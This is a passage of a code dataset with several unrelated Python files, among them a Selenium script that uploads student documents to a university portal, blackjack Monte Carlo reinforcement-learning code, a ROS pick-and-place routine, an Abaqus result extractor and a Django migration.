selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.remote.file_detector import UselessFileDetector\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\nif not os.path.isdir('logs'):\n os.mkdir('logs')\n\ncount = len(os.listdir('logs'))\nlogging.basicConfig(level=logging.DEBUG, filename=f\"logs/logfile_{count}.txt\", filemode=\"a+\",\n format=\"%(asctime)-15s %(levelname)-8s %(message)s\")\n\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.INFO)\n\nformatter = logging.Formatter('%(levelname)-8s %(message)s')\n\nconsole.setFormatter(formatter)\n\nlogging.getLogger('').addHandler(console)\nlog = logging.getLogger()\n\n\nclass Locators:\n try_iframe = '//*[@id=\"iframeResult\"]'\n try_button = '/html/body/button'\n\n login_asu = '//*[@id=\"users\"]'\n password_asu = '//*[@id=\"parole\"]'\n login_button_asu = '//*[@id=\"logButton\"]'\n\n search_field = '//*[@id=\"search\"]'\n student_name = '/html/body/table/tbody/tr[1]/td[1]/table/tbody/tr[2]/td/div/div/table/tbody/tr[2]/td[1]/div'\n student_open_button = '/html/body/table/tbody/tr[1]/td[1]/table/tbody/tr[2]/td/div/div/table/tbody/tr[2]'\n student_id = '/html/body/table/tbody/tr[1]/td[1]/table/tbody/tr[2]/td/div/div/table/tbody/tr[2]/td[2]'\n search_table_header = '/html/body/table/tbody/tr[1]/td[1]/table/tbody/tr[2]/td/div/div/table/tbody/tr[1]'\n search_button = '//*[@id=\"GO\"]'\n\n documents_button = '//*[@id=\"docum\"]'\n download_state_iframe = '/html/body/table/tbody/tr[1]/td[2]/div[2]/div/iframe'\n\n documents_table = '//*[@id=\"tableform\"]'\n documents_table_tr_tags = '//*[@id=\"tableform\"]/tbody/tr'\n\n\nclass Filler(object):\n\n def __init__(self):\n\n config = self.parse_settings()\n\n try:\n self.webdriver_location = config['Settings']['webdriver_location']\n self.asu_ste = config['Settings']['asu_ste']\n self.folder_with_sources = config['Settings']['folder_with_sources']\n self.login = config['Settings']['login']\n self.password = config['Settings']['password']\n self.wait_site = float(config['Settings']['wait'])\n\n self.debug = int(config['Debug']['Debug'])\n self.precautions = int(config['Debug']['precautions'])\n except KeyError:\n log.critical('Файл настроек не корректный!')\n exit(1)\n\n self.success_text = 'успешно загружен.'\n\n self.chrome_options = webdriver.ChromeOptions()\n # self.chrome_options.add_experimental_option(\"prefs\",\n # {'profile.managed_default_content_settings.javascript': 2})\n self.filler_driver = webdriver.Chrome(self.webdriver_location, options=self.chrome_options)\n self.filler_driver.file_detector = UselessFileDetector()\n self.wait = WebDriverWait(self.filler_driver, 60)\n\n if self.debug:\n log.info('Setting window size')\n # self.filler_driver.set_window_size(734, 936)\n self.filler_driver.set_window_position(-7, 0)\n log.info('Changing asu site')\n self.asu_ste = r'C:\\Users\\gromo\\Documents\\GitHub\\FileDownloader\\sources\\download.html'\n log.info(\"Setting fail state\")\n self.asu_ste_fail = r'C:\\gromo\\User\\Documents\\GitHub\\FileDownloader\\sources\\fail.html'\n\n log.info('Скрипт инициализирован успешно')\n\n @staticmethod\n def parse_settings():\n try:\n with open('config.ini', 'r', encoding='cp1252') as configfile:\n configfile.close()\n config = configparser.ConfigParser()\n config.read('config.ini')\n\n log.info('Настройки загружены')\n return config\n except FileNotFoundError:\n log.critical('Файл настроек не найден!')\n log.critical('Создайте и заполните config.ini согласно readme.md')\n exit(1)\n pass\n\n def get_current_student(self):\n log.info('Поиск студента в выдаче')\n try:\n found_name = self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.student_name)),\n 'Ни одного студента не найдено!')\n except common.exceptions.TimeoutException:\n return ''\n log.info(f'Текущий студент : {found_name.text}', )\n return found_name.text\n\n def fill_new_id(self, stud_id):\n log.info('Ищем поле для загрузки')\n search_field = self.filler_driver.find_element_by_xpath(Locators.search_field)\n log.info('Очищаем его')\n search_field.clear()\n log.info(f'Вводим id нового студента : {stud_id}')\n search_field.send_keys(str(stud_id))\n # print('Введён id: ', search_field.get_attribute('value'))\n\n def open_student_card(self):\n log.info('Ждём пока можно кликнуть на столбик header')\n\n header_el = self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.search_table_header)),\n \"Не получилось кликнуть в столбик!\")\n header_el.click()\n # input('Wait')\n\n log.info('Ждём элемент для открытия карточки студента')\n self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.student_open_button)),\n 'Не получилось найти элемент!')\n log.info('Ищем элемент')\n\n student_open = self.filler_driver.find_element_by_xpath(Locators.student_open_button)\n log.info('Нажимаем на студента')\n student_open.click()\n time.sleep(0.1)\n student_open.click()\n student_open.click()\n log.info('Студент должен быть открыт!')\n\n def click_search(self):\n log.info('Нажимаем в строку поиска')\n search_button = self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.search_button)),\n 'Не получилось нажать в строку!')\n search_button.click()\n time.sleep(0.1)\n search_button.click()\n\n def click_documents_button(self):\n log.info('Ждем пока можно будет нажать на документы')\n self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.documents_button)))\n log.info('Нажимаем документы')\n self.filler_driver.find_element_by_xpath(Locators.documents_button).click()\n\n def get_state(self):\n log.info('Переключаемся в окно информации о загрузке')\n self.wait.until(EC.frame_to_be_available_and_switch_to_it((By.XPATH, Locators.documents_button)))\n time.sleep(1)\n log.info('Ищем текст')\n state = self.filler_driver.find_element_by_xpath('/html/body')\n log.info(f'Состояние : {state.text}')\n\n if self.success_text in state.text:\n\n state = True\n else:\n\n state = False\n\n log.info('Ждём 1 секунду')\n time.sleep(1)\n log.info('Возвращаемся к основной странице')\n self.filler_driver.switch_to.default_content()\n if self.precautions:\n input(\"Нажмите ENTER когда подтвердите корректность информации\")\n\n # print('Refreshing page')\n # self.filler_driver.refresh()\n\n self.open_student_card()\n\n # self.click_documents_button()\n\n if self.debug:\n log.info('ТК включен дебаг считаем что документ загрузился')\n return True\n return state\n\n def get_state_by_downloaded(self, label):\n log.info(\"Узнаём загружен ли документ\")\n log.info('Для этого переоткрываем студента')\n self.open_student_card()\n\n # self.click_documents_button()\n log.info('Получаем список загруженных документов')\n downloaded_documents = self.get_downloaded_documents()\n if label in downloaded_documents:\n log.info(\"Документ загружен!\")\n return True\n else:\n log.info(\"Документ не загружен!\")\n return False\n\n def get_all_folders(self):\n folders = os.listdir(self.folder_with_sources)\n return folders\n\n def send_document(self, label, document):\n log.debug(f'Ждём {self.wait_site} секунд чтобы снизить загрузку на сайт')\n time.sleep(self.wait_site)\n rows = self.wait.until(EC.presence_of_all_elements_located((By.XPATH, Locators.documents_table_tr_tags)))\n\n log.info('Ищем куда загружать документ')\n for i in range(len(rows)):\n try:\n row_text = self.wait.until(\n EC.presence_of_element_located((By.XPATH, Locators.documents_table_tr_tags + f'[{i + 1}]')),\n 'Не получилось найти строку!').text\n except common.exceptions.StaleElementReferenceException:\n log.info('Строка не прикреплена к странице')\n log.debug(f'Ждём {self.wait_site * 2} секунд чтобы снизить загрузку на сайт')\n time.sleep(self.wait_site * 2)\n row_text = self.wait.until(\n EC.presence_of_element_located((By.XPATH, Locators.documents_table_tr_tags + f'[{i + 1}]')),\n 'Не получилось найти строку!').text\n\n row = self.wait.until(\n EC.presence_of_element_located((By.XPATH, Locators.documents_table_tr_tags + f'[{i + 1}]')),\n 'Не получилось найти строку!')\n id_row = row.get_attribute('id')\n try:\n row = self.wait.until(\n EC.presence_of_element_located((By.XPATH, Locators.documents_table_tr_tags + f'[{i + 1}]')),\n 'Не получилось найти строку!')\n row.find_element_by_tag_name('a')\n continue\n except common.exceptions.NoSuchElementException:\n pass\n\n log.debug(f'Ждём {self.wait_site / 4} секунд чтобы снизить загрузку на сайт')\n time.sleep(self.wait_site / 4)\n\n if label == row_text:\n\n log.info(id_row)\n file_path = self.wait.until(\n EC.element_to_be_clickable((By.XPATH, f'//*[@id=\"{id_row}\"]/td/form/span/input')),\n 'Ошибка получения строки для загрузки!')\n # file_path = self.filler_driver.find_element_by_xpath(f'//*[@id=\"{id_row}\"]/td/form/span/input')\n log.info(f'Найдена соответсвующая строка: {label}')\n log.info(f'Загружаем документ : {document} ')\n if self.precautions:\n prec = input(\n 'Введите сюда любые символы и нажмите ENTER чтобы загрузить документ. \\n Просто нажмите ENTER '\n 'чтобы пропустить загрузку')\n if prec != '':\n log.info('Загружаем!!')\n file_path = self.wait.until(\n EC.element_to_be_clickable((By.XPATH, f'//*[@id=\"{id_row}\"]/td/form/span/input')),\n 'Ошибка получения строки для загрузки!')\n file_path.send_keys(str(document))\n # file_path.click()\n time.sleep(1)\n log.info('Документ отправлен!')\n if self.get_state_by_downloaded(label):\n return True\n else:\n return False\n else:\n log.info('ПРОПУСКАЕМ ЗАГРУЗКУ!')\n return True\n else:\n log.info('Загружаем!!')\n file_path.send_keys(str(document))\n # file_path.click()\n time.sleep(1)\n if self.get_state_by_downloaded(label):\n return True\n else:\n return False\n log.error('Строка не найдена!')\n return True\n\n def get_downloaded_documents(self):\n log.debug(f'Ждём {self.wait_site} секунд чтобы снизить загрузку на сайт')\n time.sleep(self.wait_site)\n log.info('Ждём пока появится список документов')\n self.wait.until(EC.presence_of_element_located((By.XPATH, Locators.documents_table)))\n log.info('Ждём пока можно с ним взаимодействовать')\n self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.documents_table)))\n\n log.info('Ищем документы которые уже загружены')\n\n log.info('Ждём пока строки присутсвтуют')\n rows = self.wait.until(EC.presence_of_all_elements_located((By.XPATH, Locators.documents_table_tr_tags)),\n 'Не получилось найти строки!')\n\n downloaded_documents = []\n for i in range(len(rows)):\n time.sleep(self.wait_site / 4)\n try:\n doc_text = self.wait.until(\n EC.element_to_be_clickable((By.XPATH, Locators.documents_table_tr_tags + f'[{i + 1}]')),\n 'Не получилось найти строку!').text\n except common.exceptions.StaleElementReferenceException:\n log.info('Строка не прикреплена к странице')\n log.debug(f'Ждём {self.wait_site * 2} секунд чтобы снизить загрузку на сайт')\n time.sleep(self.wait_site * 2)\n doc_text = self.wait.until(\n EC.element_to_be_clickable((By.XPATH, Locators.documents_table_tr_tags + f'[{i + 1}]')),\n 'Не получилось найти строку!').text\n\n # doc_text = row.text\n if doc_text == '':\n break\n # print(i.text)\n downloaded_documents.append(doc_text)\n log.info('Возвращаем список')\n return downloaded_documents\n\n def change_student(self, new_id):\n for i in range(1, 100):\n log.debug(f'Ждём {self.wait_site} секунд чтобы снизить загрузку на сайт')\n time.sleep(self.wait_site)\n if i > 99:\n exit(f\"Не получилось найти студента {new_id}\")\n self.fill_new_id(str(new_id))\n time.sleep(0.1)\n self.click_search()\n\n log.info('Получаем id студента из выдачи')\n try:\n result_id = self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.student_id)),\n 'Не удалось получить id!')\n text = result_id.text\n except common.exceptions.StaleElementReferenceException:\n log.info('Строка не прикреплена к странице')\n log.debug(f'Ждём {self.wait_site * 2} секунд чтобы снизить загрузку на сайт')\n time.sleep(self.wait_site * 2)\n result_id = self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.student_id)),\n 'Не удалось получить id!')\n text = result_id.text\n\n log.info(f'Id который мы нашли : {text}')\n if self.debug:\n log.info('Считаем что он ввёлся, тк включен дебаг')\n break\n if str(new_id) not in str(text):\n log.error(\"Студент не изменился, поиск не сработал!\")\n time.sleep(1)\n continue\n else:\n log.info('Студент по id найден!')\n try:\n result_id = self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.student_id)),\n 'Не удалось получить id!')\n result_id.click()\n except common.exceptions.StaleElementReferenceException:\n log.info('Строка не прикреплена к странице')\n log.debug(f'Ждём {self.wait_site * 2} секунд чтобы снизить загрузку на сайт')\n time.sleep(self.wait_site * 2)\n result_id = self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.student_id)),\n 'Не удалось получить id!')\n result_id.click()\n\n log.info('Ждём пока откроется карточка')\n self.wait.until(EC.presence_of_element_located((By.XPATH, Locators.documents_table)))\n break\n\n @staticmethod\n def return_site_naming(document):\n for site_naming, file_naming in mapping.items():\n if type(file_naming) == str:\n if file_naming.lower().replace(' ', '') == document.lower().replace(' ', ''):\n return site_naming\n else:\n for value in file_naming:\n if value.lower().replace(' ', '') == document.lower().replace(' ', ''):\n return site_naming\n\n def check_pasp_and_reg(self, folder):\n documents = os.listdir(self.folder_with_sources + r'\\/' + folder)\n for file in documents:\n if file.lower().replace(' ', '') == \"пасп и рег.pdf\".lower().replace(' ', ''):\n log.info('Фай \"пасп и рег.pdf\" найден!')\n log.info('Загружаем в Паспорт (стр. 2-3 - с фото) и \"Регистрация по месту пребывания')\n downloaded_documents = self.get_downloaded_documents()\n file_naming = self.folder_with_sources + r'/' + folder + r'/' + documents[documents.index(file)]\n if 'Паспорт (стр. 2-3 - с фото)' not in downloaded_documents:\n self.send_checker('Паспорт (стр. 2-3 - с фото)', file_naming)\n downloaded_documents = self.get_downloaded_documents()\n file_naming = self.folder_with_sources + r'/' + folder + r'/' + documents[documents.index(file)]\n if 'Регистрация по месту пребывания' not in downloaded_documents:\n self.send_checker('Регистрация по месту пребывания', file_naming)\n\n def send_checker(self, site_naming, file_naming):\n if self.send_document(site_naming, file_naming):\n log.info('Документ загружен успешно')\n return True\n else:\n log.error('Заходим в бесконечный цикл попытки загрузки файла!')\n while True:\n log.debug(f'Ждём {self.wait_site} секунд чтобы снизить загрузку на сайт')\n time.sleep(self.wait_site)\n if self.send_document(site_naming, file_naming):\n log.info('Документ загружен успешно')\n return True\n else:\n log.error('Загрузка не удалась')\n log.info('Пытаемся снова')\n time.sleep(1)\n\n def download_unfinished_docs(self, folder):\n documents = os.listdir(self.folder_with_sources + r'\\/' + folder)\n log.info(f'Все документы в папке : {documents}')\n\n for file in documents:\n\n log.info(f'Работаем с файлом : \"{file}\" ')\n file_naming = self.folder_with_sources + r'/' + folder + r'/' + documents[documents.index(file)]\n site_naming = self.return_site_naming(file)\n if site_naming is None:\n log.info('Файл не обозначен!')\n log.info('Записываем его путь и название в UNFINISHED_DOCS.TXT')\n with open('UNFINISHED_DOCS.txt', 'a+', encoding='cp1251') as file_to_write:\n file_to_write.writelines(self.folder_with_sources + r'/' + folder + r'/' + '\\n')\n file_to_write.writelines(documents[documents.index(file)] + '\\n')\n file_to_write.writelines('\\n')\n continue\n\n log.info(f'Документ называется : {file_naming}')\n log.info(f'Соответсвующая ему строка на сайте : {site_naming} ')\n\n downloaded_documents = self.get_downloaded_documents()\n\n if site_naming in downloaded_documents:\n log.error('Документ уже был загружен!')\n continue\n\n log.info('Приступаем к загрузке')\n self.send_checker(site_naming, file_naming)\n\n def iterate_through_folders(self):\n folders = self.get_all_folders()\n for folder in folders:\n current_folder = self.folder_with_sources + r'\\/' + folder\n documents = os.listdir(current_folder)\n log.debug(f'Ждём {self.wait_site} секунд чтобы снизить загрузку на сайт')\n log.info('---------------------')\n log.info(f'Работаем с папкой: {folder}')\n if 'finished' in documents:\n log.info('Cтудент уже внесён')\n continue\n log.debug(f'Ждём {self.wait_site} секунд чтобы снизить загрузку на сайт')\n\n time.sleep(self.wait_site)\n self.change_student(folder)\n log.info('Приступаем к загрузке документов')\n self.download_unfinished_docs(folder)\n log.info('Проверяем наличие \"файла пасп и рег\"')\n self.check_pasp_and_reg(folder)\n log.info('Создаём файл finished')\n self.create_finished_folder(current_folder)\n\n @staticmethod\n def create_finished_folder(current_folder):\n file = current_folder + '/finished'\n with open(file, 'a'):\n os.utime(file, None)\n\n def test_alert(self):\n self.filler_driver.get('https://www.w3schools.com/jsref/tryit.asp?filename=tryjsref_alert')\n log.info('Waiting for iframe')\n self.wait.until(EC.frame_to_be_available_and_switch_to_it((By.XPATH, Locators.try_iframe)))\n log.info('Waiting for try butt')\n test_al = self.wait.until(EC.element_to_be_clickable((By.XPATH, Locators.try_button)))\n test_al.click()\n while True:\n log.info('waiting alert')\n alert = self.wait.until((EC.alert_is_present()), 'Alert Was not present!!!!')\n log.info('accepting')\n alert.accept()\n\n def start_browser(self):\n if not self.debug:\n self.filler_driver.get('https://asu.itut.ru/bonch/?login=no')\n\n # log.info('Ждём ошибки сертификата')\n # alert = self.wait.until(EC.alert_is_present())\n # log.info('Принимаем')\n # alert.accept()\n\n log.info('Ищем поле логин')\n login = self.filler_driver.find_element_by_xpath(Locators.login_asu)\n time.sleep(0.1)\n log.info('Вводим логин')\n login.send_keys(self.login)\n\n log.info('Ищем поле пароль')\n password = self.filler_driver.find_element_by_xpath(Locators.password_asu)\n time.sleep(0.1)\n log.info('Вводим пароль')\n password.send_keys(self.password)\n\n time.sleep(1)\n\n log.info('Ищем кнопку войти')\n login_button = self.filler_driver.find_element_by_xpath(Locators.login_button_asu)\n log.info('Кликаем')\n login_button.click()\n time.sleep(1)\n\n log.info('Переходим на сайт АСУ')\n self.filler_driver.get(self.asu_ste)\n\n time.sleep(0.1)\n\n self.click_documents_button()\n time.sleep(0.1)\n\n # input('Нажмите ENTER если программа находится на нужной странице')\n\n log.info('Начинаем цикл по папкам')\n try:\n self.iterate_through_folders()\n except Exception as e:\n self.filler_driver.quit()\n raise Exception(e)\n\n\nif __name__ == \"__main__\":\n while True:\n try:\n main_method = Filler()\n main_method.start_browser()\n log.info('Программа закончила! Нажмите ENTER для повторного прохода')\n input()\n continue\n except Exception as e:\n log.exception(e)\n log.error('ОШИБКА! Начинаем повторно')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":26670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"535283369","text":"import sqlite3\nimport cron\n\nconnection = sqlite3.connect(\"/home/pi/Zeiterfassung/Datenbanken/Arbeiter.db\")\nc = connection.cursor()\nc.execute(\"SELECT * FROM Arbeiter\")\nresult = c.fetchall()\nfor r in result:\n dname = r[0]\n print(dname)\n cron.addMonth(dname)","sub_path":"Cron/monthly.py","file_name":"monthly.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"320888963","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='urlExpander',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('DestinationUrl', models.URLField()),\n ('shortUrl', models.URLField()),\n ('httpStatusCode', models.IntegerField()),\n ('pageTitle', models.CharField(max_length=100)),\n ],\n ),\n ]\n","sub_path":"urlexpander/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"287634800","text":"import gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nenv = gym.make('Blackjack-v0')\nS = [(sum_hand, dealer_card, usable_ace) for sum_hand in range(12,22) for dealer_card in range(1,11) for usable_ace in [True, False]]\n\ndef monte_carlo_prediction():\n V = {s: 0 for s in S}\n Returns = {s: [] for s in S}\n\n for i in range(500000):\n obs = env.reset() # obs is a tuple: (player_sum, dealer_card, useable_ace)\n done = False\n total_reward = 0\n observed_states = {}\n while not done:\n if obs[0] >= 12 and obs[0] <= 21 and obs not in observed_states:\n # save state and reward up until now\n observed_states[obs] = total_reward\n if obs[0] >= 20:\n #print(\"stick\")\n obs, reward, done, _ = env.step(0)\n else:\n #print(\"hit\")\n obs, reward, done, _ = env.step(1)\n #print(\"reward:\", reward)\n total_reward += reward\n for s in observed_states:\n G = total_reward - observed_states[s]\n Returns[s].append(G) \n V[s] = np.mean(Returns[s])\n \n X, Y = np.meshgrid(np.arange(12,22),np.arange(1,11))\n Z = np.array([V[(X[x][y], Y[x][y], False)] for x in range(X.shape[0]) for y in range(X.shape[1])])\n Z = Z.reshape(X.shape)\n fig = plt.figure(figsize=(13, 5), dpi=80)\n ax = fig.add_subplot(121, projection='3d')\n ax.plot_surface(X, Y, Z, color=\"w\", edgecolor=\"k\")\n ax.view_init(40, 210)\n ax.set_xlabel('Player sum')\n ax.set_ylabel('Dealer showing')\n ax.set_zlabel('V')\n ax.set_title('No usable ace')\n ax.dist = 13\n\n Z = np.array([V[(X[x][y], Y[x][y], True)] for x in range(X.shape[0]) for y in range(X.shape[1])])\n Z = Z.reshape(X.shape)\n ax = fig.add_subplot(122, projection='3d')\n ax.plot_surface(X, Y, Z, color=\"w\", edgecolor=\"k\")\n ax.view_init(40, 210)\n ax.set_xlabel('Player sum')\n ax.set_ylabel('Dealer showing')\n ax.set_zlabel('V')\n ax.set_title('Usable ace')\n ax.dist = 13\n plt.savefig(\"ex04-mc-prediction.pdf\")\n plt.show()\n\n\ndef monte_carlo_es():\n Q = {(s,a): 0 for s in S for a in [0,1]}\n pi = {s: 0 for s in S}\n Returns = {(s,a): [] for s in S for a in [0,1]}\n num_iter = 0\n while True:\n for i in range(100000):\n S0 = S[np.random.choice(len(S))]\n A0 = np.random.choice([0,1])\n #print(\"S0:\", S0)\n obs = env.reset() # obs is a tuple: (player_sum, dealer_card, useable_ace)\n set_state(env, S0)\n obs = env._get_obs()\n #print(\"observation:\", obs)\n next_action = A0\n done = False\n total_reward = 0\n observed_states = {}\n while not done:\n if obs[0] >= 12 and obs[0] <= 21 and (obs,next_action) not in observed_states:\n # save state and reward up until now\n observed_states[(obs, next_action)] = total_reward\n obs, reward, done, _ = env.step(next_action)\n \n if obs[0] < 12 or obs[0] > 21:\n next_action = 1\n else:\n next_action = pi[obs]\n total_reward += reward\n\n\n for (s, a) in observed_states:\n G = total_reward - observed_states[(s,a)]\n Returns[(s,a)].append(G) \n Q[(s,a)] = np.mean(Returns[(s,a)])\n pi[s] = np.argmax([Q[(s,0)], Q[(s,1)]])\n num_iter += 1\n \n print(f'{num_iter} iterations')\n print('No usable ace')\n print('=============')\n print(' A23456789B')\n print(' #-------------> dealer showing')\n for sum_hand in range(12,22):\n print(f\"{sum_hand} | \", end='')\n for dealer_card in range(1,11):\n print(pi[(sum_hand,dealer_card,False)], end='')\n print()\n print(\" \\\\/\")\n print(\"player sum\")\n print()\n print('usable ace')\n print('==========')\n print(' A23456789B')\n print(' #-------------> dealer showing')\n for sum_hand in range(12,22):\n print(f\"{sum_hand} | \", end='')\n for dealer_card in range(1,11):\n print(pi[(sum_hand,dealer_card,True)], end='')\n print()\n print(\" \\\\/\")\n print(\"player sum\")\n print()\n\ndef set_state(env, s):\n player_hand = []\n if s[2]:\n while (sum(player_hand) + 11) < s[0]:\n player_hand.append(min(s[0] - (sum(player_hand) + 11), 10))\n player_hand.append(1)\n else:\n while sum(player_hand) < s[0]:\n player_hand.append(min(s[0] - sum(player_hand), 10))\n \n env.player = player_hand\n env.dealer[0] = s[1]\n\n\ndef example_main():\n # This example shows how to perform a single run with the policy that hits for player_sum >= 20\n env = gym.make('Blackjack-v0')\n obs = env.reset() # obs is a tuple: (player_sum, dealer_card, useable_ace)\n done = False\n while not done:\n print(\"observation:\", obs)\n if obs[0] >= 20:\n print(\"stick\")\n obs, reward, done, _ = env.step(0)\n else:\n print(\"hit\")\n obs, reward, done, _ = env.step(1)\n print(\"reward:\", reward)\n print(\"\")\n\n\ndef main():\n #monte_carlo_prediction()\n monte_carlo_es()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ex04-mc/ex04-mc.py","file_name":"ex04-mc.py","file_ext":"py","file_size_in_byte":5476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"132127486","text":"def main():\n \"\"\"Team House of Cards\n A modification of the the Pick and Place example which uses the\n Rethink Inverse Kinematics Service which returns the joint angles a\n requested Cartesian Pose. This ROS Service client is used to request\n both pick and place poses in the /base frame of the robot.\n \"\"\"\n rospy.init_node(\"ik_house_of_cards\")\n\n # Wait for the All Clear from emulator startup\n rospy.wait_for_message(\"/robot/sim/started\", Empty)\n\n # Starting Joint angles for both arms\n left_start = {'left_w0': 0.6699952259595108,\n 'left_w1': 1.030009435085784,\n 'left_w2': -0.4999997247485215,\n 'left_e0': -1.189968899785275,\n 'left_e1': 0.6700238130755056,\n 'left_s0': -0.08000397926829805,\n 'left_s1': -0.9999781166910306}\n right_start = {'right_w0': -0.6699952259595108,\n 'right_w1': 1.030009435085784,\n 'right_w2': 0.4999997247485215,\n 'right_e0': 1.189968899785275,\n 'right_e1': 0.6700238130755056,\n 'right_s0': 0.08000397926829805,\n 'right_s1': -0.9999781166910306}\n\n # Two pick and place opjects for each of DENIRO's arms\n hocl = PickAndPlace('left')\n hocr = PickAndPlace('right')\n\n # An orientation for gripper fingers to be overhead and parallel to the bricks\n orientation = Quaternion(\n x=-0.0249590815779,\n y=0.999649402929,\n z=0.00737916180073,\n w=0.00486450832011)\n\n lv_pick = Pose(\n position=Point(x=0., y=0., z=-0.),\n orientation=orientation)\n rv_pick = Pose(\n position=Point(x=0., y=0., z=-0.),\n orientation=orientation)\n lh_pick = Pose(\n position=Point(x=0.1, y=0, z=0.125312),\n orientation=orientation)\n rh_pick = Pose(\n position=Point(x=0., y=0., z=-0.),\n orientation=orientation)\n\n # base and height for the generated house of cards\n base = 3\n height = 1\n\n block_poses = house_builder(base, height)\n\n # move to the desired starting angles\n hocl.move_to_start(left_start)\n hocr.move_to_start(right_start)\n\n # spawn environment\n load_tables()\n\n # loop to pick and place the entire structure\n i = 0\n\n while not rospy.is_shutdown() & i > height:\n for j in range(block_poses[i]):\n if i % 2:\n print(\"\\nHorizontal block row\")\n if j % 2:\n print(\"\\nUsing left\")\n #spawn\n print(\"\\nPicking...\")\n hocl.pick(lh_pick)\n print(\"\\nPlacing...\")\n hocl.pick(block_poses[i][j])\n else:\n print(\"\\nUsing right\")\n #spawn\n print(\"\\nPicking...\")\n hocr.pick(rh_pick)\n print(\"\\nPlacing...\")\n hocr.pick(block_poses[i][j])\n else:\n print(\"\\nVertical block row\")\n if j % 2:\n print(\"\\nUsing left\")\n #spawn\n print(\"\\nPicking...\")\n hocl.pick(lv_pick)\n print(\"\\nPlacing...\")\n hocl.pick(block_poses[i][j])\n else:\n print(\"\\nUsing right\")\n #spawn\n print(\"\\nPicking...\")\n hocr.pick(rv_pick)\n print(\"\\nPlacing...\")\n hocr.pick(block_poses[i][j])\n j += 1\n i += 1\n return\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"Final_Submission/House_of_Cards.py","file_name":"House_of_Cards.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"42830972","text":"k = int(input())\nword = input()\nn = len(word)\nl = n-1\nways = 0\nprev = 0\nwhile l >= k:\n r = l - k\n if word[r] == word[l]:\n prev += 1\n ways += prev\n else:\n prev = 0\n l -= 1\nprint(ways)\n","sub_path":"yandex/day_5/I.py","file_name":"I.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"566112295","text":"\"\"\"\nScript to extract displacement and reaction force data from a tensile test with the aim of creating a load displacement curve\n\nInputs (variables to define):\n 1. cwd\n 2. odbname (no ext)\n 3. ULnode\n 4. UHnode\n\nOutput:\n None (file that contains RF, UL and UH for every time step up until fracture)\n\n\"\"\"\nimport sys\nfrom odbAccess import openOdb\ncwd = sys.argv[-1]\nodbname = sys.argv[-2]\noutputFname = sys.argv[-3]\nUHnode = int(sys.argv[-4])\nULnode = int(sys.argv[-5])\n\nodbname = odbname + '.odb'\n\nodb = openOdb(cwd + odbname)\nstepKey = odb.steps.keys()\nsteps = odb.steps[stepKey[-1]]\nall_frames = steps.frames\nlast_frame = all_frames[-1]\nassem = odb.rootAssembly\nhistData = list(steps.historyRegions.items())\nhistData = [(int(x[0].split('.')[-1]), x[1]) for x in histData[1:]]\nhistData.sort(key=lambda x: x[0])\nRF = [0.0]*len(histData[1][1].historyOutputs[histData[1][1].historyOutputs.keys()[0]].data)\nUL = []\nUH = []\nfor i in histData:\n hKeys = i[1].historyOutputs.keys()\n time = [t[0] for t in i[1].historyOutputs[hKeys[0]].data]\n if 'RF2' in hKeys:\n for c,k in enumerate(i[1].historyOutputs['RF2'].data):\n RF[c] = RF[c] + k[-1]\n if i[0] == ULnode:\n for c,k in enumerate(i[1].historyOutputs['U2'].data):\n UL.append(k[-1])\n if i[0] == UHnode:\n for c,k in enumerate(i[1].historyOutputs['U2'].data):\n UH.append(k[-1])\n\n\nRFplot = RF\nULplot = UL\nUHplot = UH\n\nwith open(cwd + outputFname, 'w') as fOut:\n for i in range(len(RFplot)):\n fOut.write(', \\t'.join([str(RFplot[i]),str(ULplot[i]),str(UHplot[i]), str(UHplot[i]-ULplot[i])])+ '\\n')\n\nodb.close()","sub_path":"ExtractFDcurve.py","file_name":"ExtractFDcurve.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"639308039","text":"'''\nState is a class that\ndescribe the state of NFA graph\n'''\nfrom typing import Dict\nfrom typing import Any\n\nfrom CONSTANT import *\nfrom nfa import *\n\nclass State(object):\n def __init__(self) -> None:\n self.ID = getId()\n self.IsEnd = False\n self.edgeMap = {} #type: Dict[str, Any]\n\n\n def addPath(self,edge:str,nfaState) -> None:\n if self.edgeMap.__contains__(edge):\n self.edgeMap[edge].append(nfaState)\n else:\n self.edgeMap[edge] = []\n 